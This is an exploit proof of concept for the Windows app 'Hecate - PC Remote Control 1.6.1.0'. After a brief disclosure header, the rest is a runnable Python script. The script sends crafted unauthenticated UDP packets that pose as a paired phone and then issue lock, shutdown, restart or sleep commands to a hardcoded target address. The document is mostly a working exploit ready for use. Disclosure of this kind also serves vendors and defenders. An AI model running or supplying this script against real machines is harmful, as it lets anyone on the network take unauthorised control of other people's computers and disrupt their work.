# Exploit Title: Hecate - PC Remote Control 1.6.1.0 - Unauthenticated
Remote System Control
# Date: 29/06/25
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://risefall.org
# Software Link:
https://apps.microsoft.com/detail/9mxqtf885mjp?hl=en-US&gl=US
# Version: 1.6.1.0
# Tested on: Windows 10

'''
Description:

Hecate - PC Remote Control 1.6.1.0 is vulnerable to unauthenticated system
control. An attacker on the same network can send crafted UDP packets to
the target without authentication,
allowing them to remotely issue system-level commands such as lock,
shutdown, restart, and sleep.

'''

import socket
import json
import uuid
import time
from datetime import datetime
import argparse
import sys


LHOST = "192.168.8.100"
TARGET_IP = "192.168.8.105"
PORT = 48436
PHONE_ID = str(uuid.uuid4()).upper()

VALID_COMMANDS = {
    "lock": "lockPc",
    "shutdown": "shutdownPc",
    "restart": "restartPc",
    "sleep": "sleepPc"
}

def send_packet(packet):
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.sendto(json.dumps(packet).encode(), (TARGET_IP, PORT))
    print(f"[Sent] {packet['command']}")

def init_connection():
    send_packet({
        "command": "init",
        "phoneId": PHONE_ID,
        "data": {
            "id": PHONE_ID,
            "brand": "ExploitDevice",
            "model": "Exploit",
            "platform": "Android",
            "ip": LHOST,
            "port": PORT,
            "connectedAt": datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")
        }
    })

def send_control_command(action):
    command = VALID_COMMANDS.get(action)
    if not command:
        print(f"[-] Invalid action: {action}")
        sys.exit(1)
    send_packet({
        "command": command,
        "phoneId": PHONE_ID,
        "data": None
    })

if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="Hecate - Send unauthenticated control commands (lock,
shutdown, restart, sleep)"
    )
    parser.add_argument(
        "--action",
        choices=VALID_COMMANDS.keys(),
        required=True,
        help="Action to perform on the target: lock, shutdown, restart,
sleep"
    )

    args = parser.parse_args()

    print("[*] Initializing connection...")
    init_connection()
    time.sleep(2)

    print(f"[*] Sending '{args.action}' command...")
    send_control_command(args.action)